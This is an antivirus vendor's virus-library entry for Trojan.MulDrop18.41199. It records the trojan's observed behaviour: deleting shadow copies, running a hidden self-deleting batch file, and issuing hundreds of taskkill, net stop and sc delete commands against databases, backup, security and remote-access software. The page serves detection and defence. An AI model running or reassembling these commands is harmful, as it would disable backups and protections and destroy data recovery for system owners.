PARA USUARIOS

Cerrar

Mi biblioteca
Mi biblioteca

+ Añadir a la biblioteca

Buscar
Buscar

Soporte
Soporte 24 horas | Normas de contactar

Escribir

una solicitud al rellenar un formulario

Llamar

+7 (495) 789-45-86

Foro

Sus solicitudes

Crear una nueva solicitud

Llamar

+7 (495) 789-45-86

Perfil

ES

RU CN DE EN ES FR IT JP KZ UZ PL BY
Cerrar
Servicios
Escáneres
Dr.Web vxCube
Demo
Peritaje de IIV
Biblioteca de virus
Base de conocimiento

Tecnologías

Términos

Formación y educación

Mitos

Noticias

Trojan.MulDrop18.41199

Added to the Dr.Web virus database: 2021-09-12

Virus description added:

Technical Information

Malicious functions
To complicate detection of its presence in the operating system,
deletes volume shadow copies.
Executes the following
  • '<SYSTEM32>\net.exe' stop U8WorkerService1
  • '<SYSTEM32>\taskkill.exe' /IM RavTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM node.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ssms.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SecureCRT.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM pvlsvr.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM wampmanager.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM bedbg.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM nginx.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM rdm.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM beserver.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM RsTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM wrapper.exe /F
  • '<SYSTEM32>\net.exe' stop UTUService
  • '<SYSTEM32>\net.exe' stop UFReportService
  • '<SYSTEM32>\taskkill.exe' /IM sqlbrowser.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM yundetectservice.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GNAupdaemon.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sshd.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SyncBaseSvr.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlwriter.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM VirtualBoxVM.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ssclient.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM msftesql.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM iempwatchdog.exe /F
  • '<SYSTEM32>\net.exe' stop UFAllNet
  • '<SYSTEM32>\taskkill.exe' /IM VBoxSVC.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlmangr.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM vm-tray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM baidunetdisk.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM VirtualBox.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM beremote.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mssearch.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SecureCRTPortable.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM vmtoolsd.exe /F
  • '<SYSTEM32>\net.exe' stop U8WebPool
  • '<SYSTEM32>\taskkill.exe' /IM eSightService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM CasLicenceServer.exe /F
  • '<SYSTEM32>\net.exe' stop U8DispatchService
  • '<SYSTEM32>\net.exe' stop NFSysService
  • '<SYSTEM32>\taskkill.exe' /IM BackupExecManagementService.exe /F
  • '<SYSTEM32>\net.exe' stop TurboCRM70
  • '<SYSTEM32>\taskkill.exe' /IM CCenter.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM fdlauncher.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM vm-agent-daemon.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM fdhost.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TeamViewer.exe /F
  • '<SYSTEM32>\net.exe' stop SentinelKeysServer
  • '<SYSTEM32>\net.exe' stop "ABBYY.Licensing.FineReader.Professional.12.0"
  • '<SYSTEM32>\net.exe' stop AgentX
  • '<SYSTEM32>\net.exe' stop "Apple Mobile Device Service"
  • '<SYSTEM32>\net.exe' stop DGPNPSEV
  • '<SYSTEM32>\net.exe' stop U8KeyManagePool
  • '<SYSTEM32>\net.exe' stop U8TaskService
  • '<SYSTEM32>\net.exe' stop U8EISService
  • '<SYSTEM32>\net.exe' stop U8SLReportService
  • '<SYSTEM32>\taskkill.exe' /IM tv_x64.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM benetns.exe /F
  • '<SYSTEM32>\net.exe' stop U8SCMPool
  • '<SYSTEM32>\net.exe' stop U8MPool
  • '<SYSTEM32>\taskkill.exe' /IM d_manage.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM softmgrlite.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM cygrunsrv.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM reportingservicesservice.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM tv_w32.exe /F
  • '<SYSTEM32>\net.exe' stop U8GCService
  • '<SYSTEM32>\taskkill.exe' /IM bengine.exe /F
  • '<SYSTEM32>\net.exe' stop U8EncryptService
  • '<SYSTEM32>\taskkill.exe' /IM ScanFrm.exe /F
  • '<SYSTEM32>\net.exe' stop NFOTPService
  • '<SYSTEM32>\taskkill.exe' /IM abs_deployer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM php.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM oracle.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Tencentdll.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DisklessServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM JhTask.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM IDDAService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Jointsky.CloudExchange.NodeService.ein /F
  • '<SYSTEM32>\taskkill.exe' /IM TXPlatform.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM IcafeServicesTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ControlServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM AutoDealService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Jointsky.CloudExchangeService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BsAgent_0.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM His6Service.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM fppdis5.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM WeChat.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM dinotify.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DataShareBox.ShareBoxService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM perl.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TransMain.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM service_agent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM AndroidServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DAService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM QQ.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TsServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM PersonUDisk.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Executer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM EnergyDataService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM emagent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM jenkins.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM NetDiskServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM AllPassCBHost.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM MPService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DumpServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ap_nginx.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM UIODetect.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM oravssw.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SOUNDMAN.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ipc_proxy.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GoodGameSrv.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM igfxHK.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SyncBaseConsole.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM "phpStudy.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM aspnet_state.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sfupdatemgr.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM igfxEM.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TNSLSNR.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM "notepad++.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM edr_monitor.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM RemoteAssistProcess.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM RAVCp164.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BarMoniService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM igfxTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM OPCClient.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BarCMService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DataShareBox.ShareBoxMonitorService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GNCEFExternal.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BarServerView.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM PrivacyIconClient.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM MySQLNotifier.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SunloginClient.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sfavsvc.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GoodGame.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM redis-server.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM edr_agent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SupportAssistAgent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM edr_sec_plan.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TsService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM 360bdoctor.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM AutoBackUpEx.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM navicat.exe /F
  • '<SYSTEM32>\net.exe' stop Mysoft.SchedulingService
  • '<SYSTEM32>\taskkill.exe' /IM AppMain.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mdm.exe /F
  • '<SYSTEM32>\net.exe' stop GNWebService
  • '<SYSTEM32>\net.exe' stop AdobeARMservice
  • '<SYSTEM32>\net.exe' stop MSExchangeFrontEndTransport
  • '<SYSTEM32>\net.exe' stop CASWebServer
  • '<SYSTEM32>\net.exe' stop FirebirdServerDefaultInstance
  • '<SYSTEM32>\net.exe' stop MSExchangeFastSearch
  • '<SYSTEM32>\net.exe' stop CASLicenceServer
  • '<SYSTEM32>\net.exe' stop AutoUpdateService
  • '<SYSTEM32>\net.exe' stop RapidRecoveryAgent
  • '<SYSTEM32>\net.exe' stop QPCore
  • '<SYSTEM32>\net.exe' stop Service2
  • '<SYSTEM32>\net.exe' stop MSExchangeDiagnostics
  • '<SYSTEM32>\net.exe' stop TeamViewer
  • '<SYSTEM32>\net.exe' stop JWService
  • '<SYSTEM32>\net.exe' stop MSExchangeDelivery
  • '<SYSTEM32>\net.exe' stop MSExchangeEdgeSync
  • '<SYSTEM32>\net.exe' stop MSExchangeImap4
  • '<SYSTEM32>\net.exe' stop RapService
  • '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Detect Service"
  • '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1300
  • '<SYSTEM32>\net.exe' stop MSExchangeIS
  • '<SYSTEM32>\net.exe' stop AGSService
  • '<SYSTEM32>\net.exe' stop TPlusStdTaskService1300
  • '<SYSTEM32>\net.exe' stop MSExchangeIMAP4BE
  • '<SYSTEM32>\net.exe' stop CASXMLService
  • '<SYSTEM32>\net.exe' stop Tomcat8
  • '<SYSTEM32>\net.exe' stop TPlusStdAppService1300
  • '<SYSTEM32>\net.exe' stop "AliyunService"
  • '<SYSTEM32>\net.exe' stop VeeamTransportSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeHMRecovery
  • '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Update Service"
  • '<SYSTEM32>\net.exe' stop VeeanBackupSvc
  • '<SYSTEM32>\net.exe' stop MSSQL$SQL2008
  • '<SYSTEM32>\net.exe' stop MSExchangeHM
  • '<SYSTEM32>\net.exe' stop VeeamCatalogSvc
  • '<SYSTEM32>\net.exe' stop JWRinfoClientService
  • '<SYSTEM32>\net.exe' stop VMAuthdService
  • '<SYSTEM32>\net.exe' stop VMUSBArbService
  • '<SYSTEM32>\net.exe' stop Realtek11nSU
  • '<SYSTEM32>\net.exe' stop "memcached Server"
  • '<SYSTEM32>\net.exe' stop TeamViewer8
  • '<SYSTEM32>\net.exe' stop "igfxCUIService2.0.0.0"
  • '<SYSTEM32>\net.exe' stop U8WorkerService2
  • '<SYSTEM32>\net.exe' stop Apache2.4
  • '<SYSTEM32>\net.exe' stop VMwareHostd
  • '<SYSTEM32>\net.exe' stop UIODetect
  • '<SYSTEM32>\taskkill.exe' /IM pg_ctl.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ThunderPlatform.exe /F
  • '<SYSTEM32>\net.exe' stop HaoZipSvc
  • '<SYSTEM32>\taskkill.exe' /IM BackupExec.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM VBoxSDS.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlservr.exe /F
  • '<SYSTEM32>\net.exe' stop "Synology Drive VSS Service x64"
  • '<SYSTEM32>\net.exe' stop "VMware NAT Service"
  • '<SYSTEM32>\net.exe' stop UFIDAWebService
  • '<SYSTEM32>\net.exe' stop JWEM3DBAUTORun
  • '<SYSTEM32>\net.exe' stop MSExchangeCompliance
  • '<SYSTEM32>\net.exe' stop VMnetDHCP
  • '<SYSTEM32>\net.exe' stop FirebirdGuardianDeafaultInstance
  • '<SYSTEM32>\net.exe' stop MSExchangeAntispamUpdate
  • '<SYSTEM32>\net.exe' stop mysqltransport
  • '<SYSTEM32>\net.exe' stop MSExchangeDagMgmt
  • '<SYSTEM32>\net.exe' stop DellDRLogSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeADTopology
  • '<SYSTEM32>\net.exe' stop WebAttendServer
  • '<SYSTEM32>\net.exe' stop Apache2.2
  • '<SYSTEM32>\net.exe' stop MSComplianceAudit
  • '<SYSTEM32>\net.exe' stop wanxiao-monitor
  • '<SYSTEM32>\net.exe' stop XenSvc
  • '<SYSTEM32>\net.exe' stop xenlite
  • '<SYSTEM32>\net.exe' stop MSExchangeMailboxAssistants
  • '<SYSTEM32>\net.exe' stop TPlusStdWebService1300
  • '<SYSTEM32>\net.exe' stop DDNSService
  • '<SYSTEM32>\taskkill.exe' /IM iexplore.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mysqld.exe /F
  • '<SYSTEM32>\net.exe' stop K3MMainSuspendService
  • '<SYSTEM32>\net.exe' stop IngressMgr
  • '<SYSTEM32>\net.exe' stop SupportAssistAgent
  • '<SYSTEM32>\net.exe' stop DFServ
  • '<SYSTEM32>\net.exe' stop MSExchangeUMCR
  • '<SYSTEM32>\net.exe' stop "Dell Hardware Support"
  • '<SYSTEM32>\net.exe' stop OMAILREPORT
  • '<SYSTEM32>\net.exe' stop "NetVault Process Manager"
  • '<SYSTEM32>\net.exe' stop AutoUpdatePatchService
  • '<SYSTEM32>\net.exe' stop NFLicenceServer
  • '<SYSTEM32>\net.exe' stop MySQL5_OA
  • '<SYSTEM32>\net.exe' stop ImtsEventSvr
  • '<SYSTEM32>\net.exe' stop RavService
  • '<SYSTEM32>\net.exe' stop d_safe
  • '<SYSTEM32>\taskkill.exe' /IM rcrelay.exe /F
  • '<SYSTEM32>\net.exe' stop RTCAVMCU
  • '<SYSTEM32>\taskkill.exe' /IM SogouImeBroker.exe /F
  • '<SYSTEM32>\net.exe' stop U8SendMailAdmin
  • '<SYSTEM32>\net.exe' stop CobianBackup10
  • '<SYSTEM32>\taskkill.exe' /IM vm-agent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TeamViewer_Service.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM java.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Att.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM httpd.exe /F
  • '<SYSTEM32>\net.exe' stop KugouService
  • '<SYSTEM32>\net.exe' stop NFVPrintServer
  • '<SYSTEM32>\net.exe' stop ceng_web_svc_d
  • '<SYSTEM32>\net.exe' stop K3ClouManager
  • '<SYSTEM32>\net.exe' stop KpService
  • '<SYSTEM32>\net.exe' stop EvtSys
  • '<SYSTEM32>\net.exe' stop pcas
  • '<SYSTEM32>\net.exe' stop DDVRulesProcessor
  • '<SYSTEM32>\net.exe' stop AngelOfDeath
  • '<SYSTEM32>\net.exe' stop MSExchangeUM
  • '<SYSTEM32>\net.exe' stop MSExchangeRepl
  • '<SYSTEM32>\net.exe' stop "OracleOraDb10g_homeliSQL*Plus"
  • '<SYSTEM32>\net.exe' stop VeeamMountSvc
  • '<SYSTEM32>\net.exe' stop MSExchangePOP3BE
  • '<SYSTEM32>\net.exe' stop CASMsgSrv
  • '<SYSTEM32>\net.exe' stop OracleDBConsoleilas
  • '<SYSTEM32>\net.exe' stop VeeamCloudSvc
  • '<SYSTEM32>\net.exe' stop CASVirtualDiskService
  • '<SYSTEM32>\net.exe' stop VeeamDeploySvc
  • '<SYSTEM32>\net.exe' stop MSExchangeNotificationsBroker
  • '<SYSTEM32>\net.exe' stop iNethinkSQLBackupSvc
  • '<SYSTEM32>\net.exe' stop VeeamNFSSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeMailboxReplication
  • '<SYSTEM32>\net.exe' stop MSExchangePop3
  • '<SYSTEM32>\net.exe' stop MSExchangeRPC
  • '<SYSTEM32>\net.exe' stop VeeamBrokerSvc
  • '<SYSTEM32>\net.exe' stop VeeamDistributionSvc
  • '<SYSTEM32>\net.exe' stop "FileZilla Server"
  • '<SYSTEM32>\net.exe' stop 360EntPGSvc
  • '<SYSTEM32>\net.exe' stop RavTask
  • '<SYSTEM32>\net.exe' stop MSExchangeTransportLogSearch
  • '<SYSTEM32>\net.exe' stop K3MobileServiceManage
  • '<SYSTEM32>\net.exe' stop ClickToRunSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeTransport
  • '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1220
  • '<SYSTEM32>\net.exe' stop MSExchangeThrottling
  • '<SYSTEM32>\net.exe' stop MySQL
  • '<SYSTEM32>\net.exe' stop TPlusStdTaskService1220
  • '<SYSTEM32>\net.exe' stop ServiceMid
  • '<SYSTEM32>\net.exe' stop MSExchangeSubmission
  • '<SYSTEM32>\net.exe' stop TPlusStdAppService1220
  • '<SYSTEM32>\net.exe' stop tmlisten
  • '<SYSTEM32>\net.exe' stop MSExchangeServiceHost
  • '<SYSTEM32>\net.exe' stop "Bonjour Service"
  • '<SYSTEM32>\taskkill.exe' /IM HaoZip.exe /F
Modifies file system
Creates the following files
  • %TEMP%\4346.tmp\4347.tmp\4348.bat
Deletes the following files
  • %TEMP%\4346.tmp\4347.tmp\4348.bat
Deletes itself.
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Creates and executes the following
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\4346.tmp\4347.tmp\4348.bat <Full path to file>"' (with hidden window)
Executes the following
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\4346.tmp\4347.tmp\4348.bat <Full path to file>"
  • '<SYSTEM32>\sc.exe' delete GPSUserSvr
  • '<SYSTEM32>\sc.exe' delete SQLANYs_sem5
  • '<SYSTEM32>\net1.exe' stop CASXMLService
  • '<SYSTEM32>\net1.exe' stop TPlusStdAppService1300
  • '<SYSTEM32>\sc.exe' delete msftesql
  • '<SYSTEM32>\sc.exe' delete GPSDaemon
  • '<SYSTEM32>\sc.exe' delete CobianBackup10
  • '<SYSTEM32>\net1.exe' stop MSExchangeImap4
  • '<SYSTEM32>\net1.exe' stop "AliyunService"
  • '<SYSTEM32>\net1.exe' stop VeeamTransportSvc
  • '<SYSTEM32>\sc.exe' delete MSSEARCH
  • '<SYSTEM32>\sc.exe' delete OracleRemExecService
  • '<SYSTEM32>\sc.exe' delete RaAutoInstSrv_RT2870
  • '<SYSTEM32>\net1.exe' stop MSExchangeHMRecovery
  • '<SYSTEM32>\sc.exe' delete "SyncBASE Service"
  • '<SYSTEM32>\sc.exe' delete wampapache
  • '<SYSTEM32>\sc.exe' delete MediatekRegistryWriter
  • '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Update Service"
  • '<SYSTEM32>\net1.exe' stop VeeanBackupSvc
  • '<SYSTEM32>\sc.exe' delete "OSP Service"
  • '<SYSTEM32>\sc.exe' delete NFWebServer
  • '<SYSTEM32>\sc.exe' delete vmware-converter-worker
  • '<SYSTEM32>\sc.exe' delete LPManager
  • '<SYSTEM32>\net1.exe' stop MSSQL$SQL2008
  • '<SYSTEM32>\sc.exe' delete "FontCache3.0.0.0"
  • '<SYSTEM32>\sc.exe' delete 360EntClientSvc
  • '<SYSTEM32>\sc.exe' delete vmware-converter-server
  • '<SYSTEM32>\sc.exe' delete BestSyncSvc
  • '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Detect Service"
  • '<SYSTEM32>\net1.exe' stop VeeamCatalogSvc
  • '<SYSTEM32>\sc.exe' delete QQCertificateService
  • '<SYSTEM32>\net1.exe' stop TPlusStdWebService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangePop3
  • '<SYSTEM32>\sc.exe' delete GPSDownSvr
  • '<SYSTEM32>\sc.exe' delete GPSMysqld
  • '<SYSTEM32>\sc.exe' delete Mysoft.Config.WindowsService
  • '<SYSTEM32>\net1.exe' stop CASVirtualDiskService
  • '<SYSTEM32>\net1.exe' stop VeeamDeploySvc
  • '<SYSTEM32>\sc.exe' delete GPSTomcat6
  • '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.UpdateService
  • '<SYSTEM32>\net1.exe' stop MSExchangeNotificationsBroker
  • '<SYSTEM32>\sc.exe' delete GPSLoginSvr
  • '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.DispatchService
  • '<SYSTEM32>\net1.exe' stop iNethinkSQLBackupSvc
  • '<SYSTEM32>\net1.exe' stop VeeamNFSSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeMailboxReplication
  • '<SYSTEM32>\sc.exe' delete GPSMediaSvr
  • '<SYSTEM32>\sc.exe' delete ErpEnvSvc
  • '<SYSTEM32>\sc.exe' delete LMS
  • '<SYSTEM32>\net1.exe' stop DDNSService
  • '<SYSTEM32>\sc.exe' delete GPSGatewaySvr
  • '<SYSTEM32>\sc.exe' delete TbossSystem
  • '<SYSTEM32>\net1.exe' stop MSExchangeMailboxAssistants
  • '<SYSTEM32>\sc.exe' delete OracleMTSRecoveryService
  • '<SYSTEM32>\sc.exe' delete GPSDataProcSvr
  • '<SYSTEM32>\sc.exe' delete semwebsrv
  • '<SYSTEM32>\net1.exe' stop RapService
  • '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1300
  • '<SYSTEM32>\sc.exe' delete GPSStorageSvr
  • '<SYSTEM32>\sc.exe' delete SQLService
  • '<SYSTEM32>\net1.exe' stop MSExchangeIS
  • '<SYSTEM32>\net1.exe' stop AGSService
  • '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1300
  • '<SYSTEM32>\sc.exe' delete OracleDBConcoleorcl
  • '<SYSTEM32>\net1.exe' stop MSExchangeIMAP4BE
  • '<SYSTEM32>\sc.exe' delete CASLicenceServer
  • '<SYSTEM32>\sc.exe' delete 360EntSvc
  • '<SYSTEM32>\net1.exe' stop Service2
  • '<SYSTEM32>\net1.exe' stop MSExchangeDiagnostics
  • '<SYSTEM32>\sc.exe' delete MsDtsServer100
  • '<SYSTEM32>\sc.exe' delete AppFabricCachingService
  • '<SYSTEM32>\net1.exe' stop TeamViewer
  • '<SYSTEM32>\net1.exe' stop JWService
  • '<SYSTEM32>\sc.exe' delete TPlusStdAppService1300
  • '<SYSTEM32>\sc.exe' delete Jenkins
  • '<SYSTEM32>\sc.exe' delete IpOverUsbSvc
  • '<SYSTEM32>\sc.exe' delete c2wts
  • '<SYSTEM32>\net1.exe' stop MSExchangeDelivery
  • '<SYSTEM32>\sc.exe' delete SSSyncService
  • '<SYSTEM32>\sc.exe' delete apachezt
  • '<SYSTEM32>\sc.exe' delete OracleJobSchedulerORCL
  • '<SYSTEM32>\sc.exe' delete ProjectCalcService16
  • '<SYSTEM32>\sc.exe' delete secbizsrv
  • '<SYSTEM32>\net1.exe' stop Tomcat8
  • '<SYSTEM32>\sc.exe' delete SSMonitorService
  • '<SYSTEM32>\sc.exe' delete eSightService
  • '<SYSTEM32>\net1.exe' stop MSExchangeDagMgmt
  • '<SYSTEM32>\sc.exe' delete MMRHookService
  • '<SYSTEM32>\sc.exe' delete OSearch16
  • '<SYSTEM32>\sc.exe' delete "Sense Shield Service"
  • '<SYSTEM32>\net1.exe' stop "VMware NAT Service"
  • '<SYSTEM32>\net1.exe' stop JWEM3DBAUTORun
  • '<SYSTEM32>\sc.exe' delete OpenSSHd
  • '<SYSTEM32>\sc.exe' delete kbasesrv
  • '<SYSTEM32>\sc.exe' delete SPTraceV4
  • '<SYSTEM32>\sc.exe' delete "UWS HiPriv Services"
  • '<SYSTEM32>\sc.exe' delete "AHS SERVICE"
  • '<SYSTEM32>\net1.exe' stop MSExchangeCompliance
  • '<SYSTEM32>\net1.exe' stop JWRinfoClientService
  • '<SYSTEM32>\sc.exe' delete smtpsvrJT
  • '<SYSTEM32>\sc.exe' delete vmware-converter-agent
  • '<SYSTEM32>\net1.exe' stop QPCore
  • '<SYSTEM32>\sc.exe' delete "FlexNet Licensing Service 64"
  • '<SYSTEM32>\net1.exe' stop AutoUpdateService
  • '<SYSTEM32>\net1.exe' stop AdobeARMservice
  • '<SYSTEM32>\sc.exe' delete jhi_service
  • '<SYSTEM32>\sc.exe' delete 360EntHttpServer
  • '<SYSTEM32>\sc.exe' delete 2345PicSvc
  • '<SYSTEM32>\sc.exe' delete VisualSVNServer
  • '<SYSTEM32>\net1.exe' stop MSExchangeFrontEndTransport
  • '<SYSTEM32>\sc.exe' delete VirboxWebServer
  • '<SYSTEM32>\sc.exe' delete zyb_sync
  • '<SYSTEM32>\sc.exe' delete Protect_2345Explorer
  • '<SYSTEM32>\sc.exe' delete vsvnjobsvc
  • '<SYSTEM32>\net1.exe' stop CASWebServer
  • '<SYSTEM32>\net1.exe' stop FirebirdServerDefaultInstance
  • '<SYSTEM32>\net1.exe' stop MSExchangeHM
  • '<SYSTEM32>\sc.exe' delete TPlusStdUpgradeService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangeFastSearch
  • '<SYSTEM32>\sc.exe' delete btPanel
  • '<SYSTEM32>\sc.exe' delete MotionBoardRCService57
  • '<SYSTEM32>\net1.exe' stop CASLicenceServer
  • '<SYSTEM32>\net1.exe' stop RapidRecoveryAgent
  • '<SYSTEM32>\sc.exe' delete TPlusStdTaskService1300
  • '<SYSTEM32>\sc.exe' delete MSMQ
  • '<SYSTEM32>\sc.exe' delete KMSELDI
  • '<SYSTEM32>\sc.exe' delete MotionBoard57
  • '<SYSTEM32>\net1.exe' stop MSExchangeEdgeSync
  • '<SYSTEM32>\sc.exe' delete SQLAgent$SQL2008
  • '<SYSTEM32>\sc.exe' delete SQLTELEMETRY
  • '<SYSTEM32>\sc.exe' delete KuaiYunTools
  • '<SYSTEM32>\sc.exe' delete ADWS
  • '<SYSTEM32>\sc.exe' delete MSSQL$SQL2008
  • '<SYSTEM32>\sc.exe' delete RemoteAssistService
  • '<SYSTEM32>\net1.exe' stop UFReportService
  • '<SYSTEM32>\sc.exe' delete Mysoft.DataCenterService
  • '<SYSTEM32>\net1.exe' stop NFVPrintServer
  • '<SYSTEM32>\sc.exe' delete NscAuthService
  • '<SYSTEM32>\sc.exe' delete U8TaskService
  • '<SYSTEM32>\net1.exe' stop ceng_web_svc_d
  • '<SYSTEM32>\net1.exe' stop K3ClouManager
  • '<SYSTEM32>\sc.exe' delete MASTER
  • '<SYSTEM32>\sc.exe' delete U8SLReportService
  • '<SYSTEM32>\sc.exe' delete FTA
  • '<SYSTEM32>\sc.exe' delete U8SCMPool
  • '<SYSTEM32>\net1.exe' stop KpService
  • '<SYSTEM32>\net1.exe' stop EvtSys
  • '<SYSTEM32>\sc.exe' delete RTCASMCU
  • '<SYSTEM32>\sc.exe' delete "U8MPool"
  • '<SYSTEM32>\net1.exe' stop K3MMainSuspendService
  • '<SYSTEM32>\net1.exe' stop KugouService
  • '<SYSTEM32>\net1.exe' stop IngressMgr
  • '<SYSTEM32>\sc.exe' delete U8KeyManagePool
  • '<SYSTEM32>\sc.exe' delete OfficeUpdateService
  • '<SYSTEM32>\sc.exe' delete U8GCService
  • '<SYSTEM32>\net1.exe' stop SupportAssistAgent
  • '<SYSTEM32>\net1.exe' stop DFServ
  • '<SYSTEM32>\sc.exe' delete asComSvc
  • '<SYSTEM32>\sc.exe' delete U8EncryptService
  • '<SYSTEM32>\net1.exe' stop "Dell Hardware Support"
  • '<SYSTEM32>\net1.exe' stop RavService
